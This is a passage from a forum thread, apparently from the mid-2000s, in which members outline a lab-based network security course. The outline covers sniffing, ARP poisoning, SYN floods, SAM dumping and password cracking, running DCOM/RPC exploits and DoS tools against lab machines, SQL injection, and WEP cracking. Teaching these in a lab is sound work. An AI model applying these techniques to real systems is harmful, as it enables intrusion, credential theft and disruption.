Page 2 of 2 FirstFirst 12
Results 11 to 12 of 12

Thread: I need help to create a Network security course

  1. #11
    Junior Member
    Join Date
    May 2005
    Posts
    28
    NMAP scanning will be good for teaching about ports/services, Network Packets, TCP flags, etc.

    ARP poisoning, like I said, can teach about ARP, switched networks, packet sniffing, etc

    DoS (SYN flood) could teach about the TCP connection queue and SYN cookies

    IP Spoofing can teach about the three way handshake (ACK #'s, SYN #'s) and exploiting trust relationships.

    This is a solid start and all of these things can be tested in a lab. NMAP scan a test box, ARP poison two communicating machines and sniff, SYN flood some test box ON THE LOCAL NETWORK, IP spoof some box running one of the r* services, etc.
    An ancient chinese man once told me: \"The hotter the tea, the bigger the wang.\"

    My tea is extra hot.

  2. #12
    Senior Member
    Join Date
    Jan 2003
    Posts
    3,915
    Hey Hey,

    I think that a couple of things need to be decided upon before you start planning this course.

    1. What user level is this based at... You mention basic knowledge of linux and tcp/ip.. but what does that really mean? Someone who's installed linux once because they heard l33t hax0rs user it??? or someone who's been using it and playing with it for 6 months - a year... TCP/IP... someone who setups up the occasional LAN for a LAN Party... or someone who has completed their Network+, CCNA, Nortel NetKnowledge, etc courses? This will play a major role... If these people are coming in with the barebones knowledge then you'll have to start a lot simpler.. but if you're focusing this course on CCNA holders that have played with linux for a couple years... the course can be a bit more advanced..

    2. How intense can a 40 hour course be... Are there tests? A Final Exam... Practical Tests? My security course last semester ran 115 hours in the classroom.. and about equal hours outside the class on homework and studying... This semester is the same length... From the scheduled plans it sounds like a Continuing Education course... this means people who have been out of the classroom for a while and aren't used to learning... It also means people with lives who won't be able to do a lot of outside study... (or won't be commited to it)..

    3. This is a two part.... who is this course aimed at... and how much do you value your reputation as an IT employee.... If they want a "Computer Hacking" course... it sounds like they want to aim this at High School students and COllege students... It's lose/lose before you even start... They won't work unless you give them something that's really "Underground" and then they'll just goof off.. the class is a failure before you start it... If it's a Computer Security course... are you focusing on Home User or Corporate Security... Are you focusing on IT members of the community or non-IT people... You mention a basic course.. but basic to which level of study.

    If you're looking for a "Computer Hacking" course... then I think you're on track with using knoppix-std (however, I'd recommend Auditor or Whoppix since they're usually kept more up-to-date)...

    However if you're looking for a Computer Security course... then it's a knowledge level thing...

    Don't be worrying about "hacking" and the actual exploitation... So it' s lab-based.. this makes sense... most people learn better this way (that's why University students are tools in the real world)...

    If you take your initial layout.. 5 weeks.. 4 hours (sat and sun)... Then divide the course up.... even if it is lab based, you need theory... If it's really as basic as you're making it seem... I think using a live CD is useless...because getting into nmap, nessus, etc isn't the best way to start... You need to go to the bare bones basic level..

    Eg.

    Week 1
    Day 1
    Hour 1: Introduction (What is Computer Security and WHy is it important)
    Hour 2: CIA -- This is the basis for all computer security... make them understand that..
    Hours 3 & 4: A very cool little lab that my security prof used last semester to introduce the basics... "Packet sniffing"

    Here's how it works..
    Divide the groups up into teams... we had 8 groups... 2 were Stock Brokers, 2 were banks, 2 were "Evil Hax0rs" and 2 were "Security Auditors"

    1 brokerage firm and 1 bank are in a partnership... so 4 groups per side

    Brokerage Firm ---- Hax0rs ---- Auditors ---- Bank

    Give the brokerage firm and the bank information.. say the bank $amounts in a group of peoples accounts... and the brokerage firm $amounts that people want to buy/sell... Give them names, but not the other persons information... and then restrictions.. like they can only sell if they have $X in their bank acount...

    Give the brokerage firm and the bank a few minutes to meet and discuss an "encryption scheme" soemthing simple that they can agree on... My group picked Rot13 but other groups just used stuff they made up... Then they have to transfer packets.. but they have to fill in the src, destintation, message, etc on each packet (piece of paper)... They pass it ot he group closest to them (Hax0rs or Auditors) who pass it to the opposite group and then to the recieving end... They have to successfully create all the trades in X amount of time... sending one packet at a time... and if they forget anything from the "packet" then the hax0rs or audiors can "drop it" and they only get like 10-15 econds with the packet before they have to pass it.. so they have to be quick about copying the information and following the "stream"

    I can give you more details by PM if yer at all intersted.... it was a great learning experience for most of the class..

    Day 2:
    Hour 1: Cover yesterdays "packet sniffing lab" .. Ask hackers and audiors how they kept up... What methods they used.
    Hour 2: explain real packet sniffing.. through a hub and through a switch.. .
    Hour 3: Lab using Ethereal... compare what they see to what they did..
    Hour 4: (if Ethereal doesn't chew this up)... Ettercap and use a switch.


    Week 2:
    Day 1:
    Hour 1: Continue with your "packet snifffing Lab" This time the encryption.. How questions about how they decided what to do.
    Hour 2: Cover Encryption -- Basics (AES-256, DES, 3DES, IDEA, etc)
    Hours 3 and 4: Encryption Lab: I recommend Invisible Secrets Trial version for Windows... but you could use other software..

    Day 2:
    Hour 1: Last day to use your "packet sniffing lab"... This time do TCP Flags adn give a brief explanation..
    Hours 2: Use Ethereal Again (reaffirm this knowledge because it's important) and this time focus on the flags... Find out how the groups guarnteed their transmission.. or if they did in the lab..
    Hour 3 -4 : Break away from the lab completely and let them have some fun... Cover password policies, etc for like 30 minutes and then give them an hour and a half lab on passwords... use a windows machine to create a series of users and passwords (based on ones they supply... )... Dump the SAM file (demo how to do this) and distribute it to the students... set them forward to crack the files using john the ripper, LC5 (trial) or maybe ophcrack. Make sure you cover Brute Force, Dictionary and Rainbow Tables.

    Week 3:

    Day 1("Hax0ring day (half way through.. time for fun)":
    Hour 1: Cover the importance of patching a system and applications...
    Hour 2: Distribute copies of exploits such as the dcom or rpc exploits and have them do a lab exploiting unpatched machines to demonstrate the downfall.. Again have them sniff to see exactly what's happening
    Hour 3: Cover denial of service (include prevention... aka firewall or whatever)
    Hour 4: Distribute some DoS or DDoS tools and let them play with it (again make them sniff)

    Day 2(Practical Test):
    Hour 1: Review (in a short course, you need to do this)
    Hour 2: Create a 2 hour test that covers everything you've coverd so far.. (maybe a simple war game... setup the room on hubs or switches or a little of both.. setup your PC as a webserver, and also vulnerable to some sort of exploit, Transfer a file from your PC to another and in it have the name of an exploit that it's vulnerable to... and a password for the website on the server, seperate files).... See how many of them can sniff the data (using the correct tool)... determine your machines address and then access the website and upload (using a simple php upload script hat you have running) the sourcecode for the proper exploit (named <their name>.c)
    Hour 4: Let them run a little late if needed and then wrap up by covering the lab and which parts they found difficult.

    Week 4:
    Time for some port scanning..

    Day 1:

    Hour 1: Cover TCP Ports (Common Ports, Well Known Ports, Ephemeral Ports) and the basics of a TCP Connect scan and a Syn scan
    Hour 2: Pull out nmap and setup some machines for them to scan... have a few different devices so they can see OS detection.. maybe a router or managed switch, a windows machine and a linux machine
    Hours 3 & 4: Change the pass and cover physical security... show a scene out of a movie (such as T2) that's got a short section that demos plenty of physical security. the lab can be identifying the types of physical security in place.. and then explain and cover them.

    Day 2:

    Hour 1: Explain Security Auditing
    Hour 2: Run a short intro to nessus...
    Hour 3-4: Setup another mini wargame.. have them run a nessus scan against a vulnerable machine (something that nessus will find)... give them a list of online exploit repositories.. and let them find the correct exploit

    Week 5:

    Day 1:
    Hour 1: Cover Protection more in depth... File system security, Firewalls (hardware and software), iDS
    Hour 2: Walk them through writing some Iptables/ipchains rules (use their thus gained TCP/IP knowledge to hepl them and to reaffirm it)
    Hour 3: Setup an IDS (snort perhaps) with them
    Hour 4: Have them generate some traffic and sniff it.. compare the ethereal/ettercap results with the snort messages and watch the difference between traffic with the firewall down adn the firewall up.

    Day 2:
    Hour 1: Finish up your analysis from last week
    Hour 2 (have some more fun): teach them the basics of mySQL and PHP and cover some basic injection
    Hour 3-4: bring up wireless... maybe demo wepcrack
    Final: Wrap everything up.. leave them with some resources to continue their learning (AO, WebGoat, Hacme Bank, SecurityForest, SecurityFocus, Secunia, PacketStorm, Shmoo, K-Otik (FrSIRT), milw0rm, etc)

    Anyways.. It's 4:30 AM and apparently Ijust spent an hour typing that.. but that's how I'd design it... I think had my first security been structured more like that. a lot of the students would have come out a little better off (then again.. some learned a lot)

    Take what ya want and burn the rest :P

    Peace,
    HT

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •